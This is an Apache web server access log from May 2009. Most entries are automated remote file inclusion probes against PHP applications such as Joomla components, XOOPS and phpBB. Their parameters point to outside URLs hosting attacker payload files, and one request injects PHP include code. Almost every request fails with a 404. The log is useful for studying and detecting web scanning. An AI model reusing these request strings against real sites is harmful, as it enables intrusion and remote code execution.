193.231.42.152 - - [30/May/2009:07:15:09 -0500] "GET /logs/index.php?meio=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
193.231.42.152 - - [30/May/2009:07:15:09 -0500] "GET /index.php?meio=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
88.40.90.61 - - [30/May/2009:07:17:46 -0500] "GET /logs//include.php?path[docroot]=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
88.40.90.61 - - [30/May/2009:07:17:47 -0500] "GET //include.php?path[docroot]=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
94.23.200.54 - - [30/May/2009:07:20:22 -0500] "GET /logs/access_log.1242172800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:07:20:22 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:07:20:22 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
123.125.64.38 - - [30/May/2009:07:21:13 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
76.73.56.159 - - [30/May/2009:07:21:46 -0500] "GET /logs/access_log.1242432000/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 352 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:21:46 -0500] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:21:46 -0500] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 330 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:07:21:55 -0500] "GET /logs/access_log.1242000000/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.zodiak.lv////ftp/fx29id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:07:22:14 -0500] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:07:22:15 -0500] "GET /logs/access_log.1242000000/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:07:22:15 -0500] "GET /logs/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
94.23.200.54 - - [30/May/2009:07:22:20 -0500] "GET /logs/access_log.1242172800/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:07:26:54 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:07:26:54 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:07:26:54 -0500] "GET /logs/access_log.1237248000/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:07:26:54 -0500] "GET /logs/access_log.1239667200/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:07:27:07 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:07:27:07 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:07:27:07 -0500] "GET /logs/access_log.1239667200/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
69.50.197.106 - - [30/May/2009:07:27:07 -0500] "GET /logs/access_log.1237248000/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:07:27:08 -0500] "GET /logs/access_log.1239667200/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:07:27:08 -0500] "GET /logs/access_log.1237248000/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:07:27:08 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
74.208.111.178 - - [30/May/2009:07:27:08 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.xshellbrx.by.ru/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
88.40.90.61 - - [30/May/2009:07:32:24 -0500] "GET /logs/index.php?meio=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
88.40.90.61 - - [30/May/2009:07:32:26 -0500] "GET /index.php?meio=http://10thplanet.com/playlist/scan/httpd.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
72.18.148.82 - - [30/May/2009:07:33:57 -0500] "GET //admin.php?include_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:33:57 -0500] "GET /logs/access_log.1237248000//admin.php?include_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:33:57 -0500] "GET /logs//admin.php?include_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:33:57 -0500] "GET /logs/access_log.1238371200//admin.php?include_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:33:58 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:33:58 -0500] "GET /errors.php?error=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:33:58 -0500] "GET /logs/errors.php?error=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
76.73.56.159 - - [30/May/2009:07:35:27 -0500] "GET /logs/access_log.1230508800/errors.php?error=http://www.klean-tech.com.tw/UserFiles/soc/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:07:36:15 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 295 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:07:36:15 -0500] "GET /logs/access_log.1239062400//Neos_Chronos/header.php?base_folder=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 322 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:07:36:15 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 300 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:07:36:15 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 322 "-""Mozilla/5.0"
88.40.90.61 - - [30/May/2009:07:37:23 -0500] "GET /logs/index.php?meio=http://www.buttecreekcanyon.net/History/0sirys.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
88.40.90.61 - - [30/May/2009:07:37:23 -0500] "GET /logs/access_log.1239753600/index.php?meio=http://www.buttecreekcanyon.net/History/0sirys.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
88.40.90.61 - - [30/May/2009:07:37:24 -0500] "GET /logs/access_log.1242086400/index.php?meio=http://www.buttecreekcanyon.net/History/0sirys.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
88.40.90.61 - - [30/May/2009:07:37:26 -0500] "GET /index.php?meio=http://www.buttecreekcanyon.net/History/0sirys.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
59.24.49.35 - - [30/May/2009:07:38:57 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:07:38:57 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:07:38:57 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:07:38:57 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:07:39:03 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:07:39:03 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:07:39:03 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 304 "-""Mozilla/5.0"
59.24.49.35 - - [30/May/2009:07:39:03 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://sanaaalkari.com/test/fx29id.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:41:15 -0500] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:41:15 -0500] "GET /logs/access_log.1236988800/NuclearBB/tasks/send_queued_emails.php?root_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:41:15 -0500] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:41:15 -0500] "GET /logs/access_log.1238371200/NuclearBB/tasks/send_queued_emails.php?root_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
210.48.158.168 - - [30/May/2009:07:42:11 -0500] "GET /logs//phpyabs/moduli/libri/index.php?Azione=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.808"
210.48.158.168 - - [30/May/2009:07:42:12 -0500] "GET //phpyabs/moduli/libri/index.php?Azione=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
64.182.124.1 - - [30/May/2009:07:43:56 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 295 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:07:43:56 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 300 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:07:43:56 -0500] "GET /logs/access_log.1239062400//Neos_Chronos/header.php?base_folder=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 322 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:07:43:57 -0500] "GET /logs/access_log.1236384000//Neos_Chronos/header.php?base_folder=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 322 "-""Mozilla/5.0"
195.228.45.60 - - [30/May/2009:07:48:15 -0500] "GET /logs///bbshop/shop/index.php?_shop_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
195.228.45.60 - - [30/May/2009:07:48:16 -0500] "GET ///bbshop/shop/index.php?_shop_path=http://www.dirk-gerber.de/phpkit/content/download/safe1.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
85.10.128.219 - - [30/May/2009:07:48:25 -0500] "GET /logs/common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:07:48:25 -0500] "GET /common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:07:48:25 -0500] "GET /logs/access_log.1238112000/common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
85.10.128.219 - - [30/May/2009:07:48:25 -0500] "GET /logs/access_log.1239494400/common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
88.80.198.13 - - [30/May/2009:07:49:53 -0500] "GET /logs///include/admin.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
88.80.198.13 - - [30/May/2009:07:49:53 -0500] "GET /logs/access_log.1242432000///include/admin.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.80.198.13 - - [30/May/2009:07:49:53 -0500] "GET ///include/admin.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.80.198.13 - - [30/May/2009:07:50:10 -0500] "GET /logs/access_log.1242172800///include/admin.lib.inc.php?site_path=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:50:32 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:50:32 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:07:50:32 -0500] "GET /logs/access_log.1242259200//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.116 - - [30/May/2009:07:51:01 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.116 - - [30/May/2009:07:51:37 -0500] "GET /logs/access_log.1221955200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.38.31.27 - - [30/May/2009:07:51:41 -0500] "GET /logs/common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/v6id.txt?????? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
70.38.31.27 - - [30/May/2009:07:51:41 -0500] "GET /common/init.php?CFG[CDIR]=http://www.die-grenzreiter.com/content/download/v6id.txt?????? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.6.231.215 - - [30/May/2009:07:57:02 -0500] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
65.55.106.181 - - [30/May/2009:07:58:38 -0500] "GET /logs/access_log.1165968000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.185.20.88 - - [30/May/2009:07:59:40 -0500] "GET /errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.185.20.88 - - [30/May/2009:07:59:40 -0500] "GET /logs/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.185.20.88 - - [30/May/2009:07:59:48 -0500] "GET /logs/access_log.1233360000/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.185.20.88 - - [30/May/2009:07:59:49 -0500] "GET /logs/access_log.1230681600/errors.php?error=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:08:00:55 -0500] "GET /?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:08:00:56 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:08:00:57 -0500] "GET /logs/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 200 191349 "-""Mozilla/5.0"
216.17.99.13 - - [30/May/2009:08:01:01 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://jasek2.fileave.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
79.35.214.199 - - [30/May/2009:08:01:51 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
79.35.214.199 - - [30/May/2009:08:01:51 -0500] "GET //include/admin.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
74.55.117.34 - - [30/May/2009:08:03:00 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
74.55.117.34 - - [30/May/2009:08:03:00 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
74.55.117.34 - - [30/May/2009:08:04:06 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
74.55.117.34 - - [30/May/2009:08:04:06 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
74.55.117.34 - - [30/May/2009:08:04:07 -0500] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
74.55.117.34 - - [30/May/2009:08:04:07 -0500] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
64.182.124.1 - - [30/May/2009:08:04:15 -0500] "GET //skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 296 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:08:04:17 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 301 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:08:04:17 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 323 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:08:04:37 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 323 "-""Mozilla/5.0"
88.40.90.61 - - [30/May/2009:08:04:56 -0500] "GET /logs/access_log.1240444800/index.php?meio=http://www.buttecreekcanyon.net/History/0sirys.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
64.182.124.1 - - [30/May/2009:08:06:05 -0500] "GET //skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 296 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:08:06:05 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 301 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:08:06:06 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 323 "-""Mozilla/5.0"
64.182.124.1 - - [30/May/2009:08:06:28 -0500] "GET /logs/access_log.1237420800//skin/zero_vote/error.php?dir=http://www.familienzentrum-am-sedansberg.de/contenido/includes/id1.txt?? HTTP/1.0" 404 323 "-""Mozilla/5.0"
88.80.198.13 - - [30/May/2009:08:07:55 -0500] "GET /logs///product.php?xcart_dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.80.198.13 - - [30/May/2009:08:07:55 -0500] "GET ///product.php?xcart_dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
88.80.198.13 - - [30/May/2009:08:08:02 -0500] "GET /logs/access_log.1231891200///product.php?xcart_dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
88.80.198.13 - - [30/May/2009:08:08:02 -0500] "GET /logs/access_log.1231804800///product.php?xcart_dir=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
209.25.170.73 - - [30/May/2009:08:13:14 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
209.25.170.73 - - [30/May/2009:08:13:15 -0500] "GET //guestbook1//admin.php?include_path=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
218.246.20.221 - - [30/May/2009:08:14:28 -0500] "GET /logs/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.246.20.221 - - [30/May/2009:08:14:28 -0500] "GET /logs/access_log.1233360000/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.246.20.221 - - [30/May/2009:08:14:30 -0500] "GET /logs/access_log.1230681600/errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:08:15:17 -0500] "GET /logs/access_log.1240876800/home.php?index=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:08:15:17 -0500] "GET /home.php?index=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:08:15:17 -0500] "GET /logs/home.php?index=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
213.198.53.173 - - [30/May/2009:08:15:55 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
213.198.53.173 - - [30/May/2009:08:15:55 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://stptcellular.net/webalizer/v4id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
72.18.148.82 - - [30/May/2009:08:16:12 -0500] "GET /logs/access_log.1241049600/home.php?index=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.18.148.82 - - [30/May/2009:08:16:12 -0500] "GET /logs/access_log.1241481600/home.php?index=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
211.172.225.50 - - [30/May/2009:08:17:31 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
211.172.225.50 - - [30/May/2009:08:17:31 -0500] "GET //guestbook1//admin.php?include_path=http://www.aziendainlinea.it/b1ttletX1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
122.153.212.195 - - [30/May/2009:08:17:48 -0500] "GET ///bbshop/admin/index.php?_shop_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
122.153.212.195 - - [30/May/2009:08:17:53 -0500] "GET /logs///bbshop/admin/index.php?_shop_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
122.153.212.195 - - [30/May/2009:08:17:57 -0500] "GET /logs/access_log.1232755200///bbshop/admin/index.php?_shop_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
122.153.212.195 - - [30/May/2009:08:18:06 -0500] "GET /logs/access_log.1230681600///bbshop/admin/index.php?_shop_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.208.135 - - [30/May/2009:08:18:15 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [30/May/2009:08:18:17 -0500] "GET /logs/access_log.1240272000 HTTP/1.1" 200 996758 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
116.36.213.166 - - [30/May/2009:08:20:49 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://striderrider.com/plugins/system/legacy/simple.jpg? HTTP/1.1" 404 298 "-""Mozilla/5.0"
